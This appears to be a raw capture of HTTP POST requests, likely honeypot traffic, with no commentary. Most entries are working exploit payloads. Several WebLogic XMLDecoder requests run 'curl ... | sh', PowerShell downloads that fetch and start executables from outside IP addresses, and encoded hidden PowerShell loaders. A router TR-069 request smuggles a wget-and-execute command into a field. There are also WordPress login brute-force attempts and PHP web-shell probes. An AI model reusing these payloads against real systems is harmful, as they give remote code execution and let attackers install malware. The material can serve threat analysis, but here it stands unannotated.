Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache

VQ+xzXQfANar/BLBDvX9cQARjcKzPT6X6Ah5ttB40lTV3g7Xe7BXBEmjv9sCp9e9uttbO02bbSGHLVxhhdlyfuW8DKAPzMXl/USVzrBuhK8R5biz9ArAuG8gWYbRnxHXJuj7M82Vc+4v9ooAL4CwWbNRGj+h7ARN1CqqNngARLlkRC0EYJiD7QyC3BCVWu15IaWm0xlIZJYmJ7njGYK50d/gC31qqhh+oitt1/B408E+zIpD3hKY4/dQDI6RysJrtbKBuhNSf2MR7g1U2vE92kn2aquaIShgTLTVMDviT9C7pRQvlMotTI4Ip8o5GoEySKnyaovSxM2SuDX/n2Mevbj7dfs8zo0TMtE4PesnbSbOwdZtRVvmVEjBUds=

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 400
Cache-Control: no-cache

RKRXwtzMZPYRbdTeQULkXIPTgMoZZngu8vZW3pxA5+JACY17FrRJ1uHSaIMeLS32VQp+d9Szy2N22QBA0QC87wLLxXCPielaimfN5LfCvoSa2t8sZC+xWT0Rzsu1EqUyWLYMeF3y02e4JfxX7fXjPbFTlZWW2kO5g0CYFi4m9ZmDYvuSWxtDig/e8nwbbJMeq+sfN8I5WCpGsdX3b9PLiqJjrbSQOx+wxK6YFHEezMmRl3+yj4D95Gra0eMZ7yi1EFzs77d8GJBTxx99UHNwsAXOfIU3L6u0XAEMGYNUyDr1sTrU9QwnO7otSdHShpIBB5rMObQrrEY9MCS3kitaPIOLUc+SX9rCa4rP8OW13phZlAZk3fTcW4rE6/tuw0exYsS6xy8YMtOGUA==

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
›Æ˜#Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÑfl%Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 809
Host: x.x.x.x:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java version="1.8.0_131" class="java.beans.XMLDecoder">
     <void class="java.lang.ProcessBuilder">
     <array class="java.lang.String" length="3">
     <void index="0">
     <string>cmd</string>
     </void>
     <void index="1">
     <string>/c</string>
     </void>
     <void index="2">
     <string>powershell (new-object System.Net.WebClient).DownloadFile('','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
     </void>
     </array>
     <void method="start"/></void>
     </java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
    </soapenv:Envelope>

POST http://check.best-proxies.ru/azenv.php?auth=146182398457718&a=PC&i=2733905975&p=8888 HTTP/1.1
Cookie: testCookie=true
Host: check.best-proxies.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: http://best-proxies.ru/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195



POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADAALgAyADUALgAxADQAOAAuADIAMAAyAC8AaQBtAGEAZwBlAHMALwB0AGUAcwB0AC8ARABMAC4AcABoAHAAJwApADsA</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://check.proxyradar.com/azenv.php?auth=146875038589&a=PSCMN&i=2734486398&p=3128 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache

log=172&pwd=172zxcv

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 520

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;wget http://5.8.65.5/1;chmod 777 1;./1`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>



POST http://123.249.24.233/POST_ip_port.php HTTP/1.0
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache

&verifycode=&ip_port=162.252.243.126:8080

POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 26



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://123.249.24.233/POST_ip_port.php HTTP/1.0
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache

&verifycode=&ip_port=162.252.243.126:8080

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 20
Cache-Control: no-cache

log=admin&pwd=789789

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
a‰ÃÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞-Y›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 20
Cache-Control: no-cache

log=admin&pwd=admin7

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
pÈ!3Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl

POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked

21e
ÂY
w€|`9dAVp
Mo)M\WRexTP$fnax]Huíbu(
aJLZgj-: wR"5=dWHmS?\_TT>WVRZce
B>\L0fM%&_A5VHZqjNYXd}rWDTPIhzL^R_g}fRYU@edWAPu/IP6V[H>-^RfycWQNizM\Sgk \Ld{\^2
1AUXiz	QSfyW5^Cq3WAPne
DrWXMZ-&WVA	8$D9V

V?)5(D^rDCBndWAPfxiW[QLkxCTW\n~rGDTChqDTRX6zgW\?@
e/SaWYZqjNYH2~fSKeqA]_dqM2BZPOo|^_u4IrKDTYT>WVV\dx
eJLrWy/IQ5F	

V1!
	AFu<
fQBCrD]VXn{`P^W@iAT[Fu*
rQ\P9{CYZ6|N
i@Mk)@
Zfz1JLZgjYZR2x`G_XM<}
R\bzQcU
dzW>


POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22



POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die((string)(111111111*9));

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

axa=die('Hello, Peppa!');

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 364
Cache-Control: no-cache

FqVZxYjJYg0hwSopzpASRObvvk2vNpg/8iFkXt8M3O7tf/q4uAzV66HIfdPrL2MiDC3q2fHeVXASHXtGUmMuDbFsFmwU4E5hgRYzYzfmWcS30jRxG75l2MZyrtcNcOzI4C2QXVwVzTVgDzwxnwtwAXGFBBfm9vAy+uGP2DDDmXAwjsCDNv97ZYG3QwAvdcV5h5mw5e56G31LPLohkP+6IIaM3HKcSoV0VcmW/SZHo9+8gYqgw0LIkXqvTjuCVaMIsUn5PgMLyY6XV+wHJFHU7FPvsE0ZsqaG0+jBvcbWPYqLoHo943jE6vhk1IpfJxpxSVL6EqhHqrUp9eZDEffxauSR5JbKVI7ubpHUJRET2g==

POST http://uc.ucweb.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: uc.ucweb.com:80
Connection: Keep-Alive

<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36
Host: x.x.x.x
Content-Length: 0
Connection: Keep-Alive



POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache

log=jamesatchue&pwd=jamesatchue222

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
ü‰
ÎÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î™95Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 420
Cache-Control: no-cache

FKddl9qaZS8LBAdDK40Cfvqtz9utdgOh+VCe2DOv/6ifw8Z5U2HqGDbPLviPZdnf9j8WOMaUjk0/tqT7vMdZWaWaZtlMZUfQ+Dm2zgDZzsaO+o7mH1GCWIbuQYXXHtXEbcT2NjWgD9BWU//1Vt6/LB96AxFoqQcvFFEMBr7sOkpHN00vqA9mx+LlT1D5sm5u6ExJd8KeHrlpyBpdrx1p5zBtNvjD1sjmqh3fDStcbzZ+KPhjh+cPa1bp5CLu2/cCz/wvaqOUTpT9HL0CQxmjMbwIxmJxTIZi7fByEmrnm8Uu6aa9mEh0sN79hnQbed3WnkerW8RSCGuXBvk+T23gWGW16DsYHGidIiRBXbXqyjy/24SrhWD9bREHQvZLAWLTAtde6Cx04iDaGM/1T6fwocMEjmi+srT4n6gk

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
ÖÖ§ŒÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îp2Y›∆√«∆fl

POST http://d.applovin.com/device?device_token=MaznYs97JTiqaqEwnZGZ5hoNAbGKHRajj5FMcZF_ODHYTEi_kuVCQ4yNWoT9kVKCYOdmiOu8EBuDlBzDf9dDAcksZAxPMlyVV-CvlM0u7mEUGLyh8g8trSy-C2iSYtXpQsCRhRgeTqA7eY2q-c8xqFHgtRJiJ0jgDFMg8-H0uSU= HTTP/1.1
Content-Type: application/json; charset=utf-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: d.applovin.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 970

{"app_info":{"package_name":"com.virgil.basketball","ic":true,"installed_at":1494391549000,"app_version":"3.6","first_install":"false","applovin_sdk_version":"6.3.2","app_name":"Basketball Mania"},"device_info":{"os":"4.4.4","model":"MI 4LTE","tz_offset":7,"locale":"in_ID","sdk_version":19,"dnt":false,"type":"android","country_code":"ID","revision":"cancro","carrier":"TELKOMSEL","brand":"Xiaomi","orientation_lock":"portrait","idfa":"8776479c-11a4-48e7-8a70-96e640a29187","wvvc":0},"stats":{"ad_req":184,"FetchNextAd_time":2884124,"SubmitData_time":487911,"RepeatSubmitData_time":360743,"RenderAd_time":1552981,"TaskDispatchPostback_time":369813,"ad_session_start":1496222733705,"FetchNextAd_count":182,"RepeatFetchNextAd_time":616015,"cached_files_expired":66,"RepeatFetchNextAd_count":24,"RepeatSubmitData_count":20,"TaskDispatchPostback_count":39,"TaskCollectAdvertisingId_time":21039,"TaskCollectAdvertisingId_count":39,"SubmitData_count":35,"RenderAd_count":68}}

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 444
Cache-Control: no-cache

SvAMkN7AMSAulBV0nN1Vcb2V4BQF9iQ8P2MqhHKd2IdKO0hDeUk7i0IT0W9o+rWJT6FY/lreE6pcw3QgW6nRiPa9MyoOx8YBS0l8uZV7Gl3yGyytkaNfos9sdt+2MWdM9rdpjA2Vg8Pe9+SNZjoEgWgNUZodN9X4mCSq4PX9MN7LANDeeMBjQ6l56Q7T8olC+IfvWwkn2e4KSp5wf/VR65viKyudWmPJS35lOJaP6EZv6QpWxhDlZj4aJQInR+aWpIlcz10WdRY8D4f5dNuweEfhetu28H6z9yZU1Uk75FcNnh0s1f5D3lHfH832xNVlHJXebONWMgdiDmCHTx46lihm8ZULIxdIX05SywdFIB/X95JadR6Nmjn9b7UMXgQpisdk1R7bk0skitbo+Fj+bunsHQH0r+OqmUA2DDgNV/m/pa7KDdb/l032cQ==

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die((string)(111111111*9));

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

axa=die('Hello, Peppa!'.(string)(111111111*9));

POST http://t7.proxy-checks.com/favicon.ico HTTP/1.1
Host: t7.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   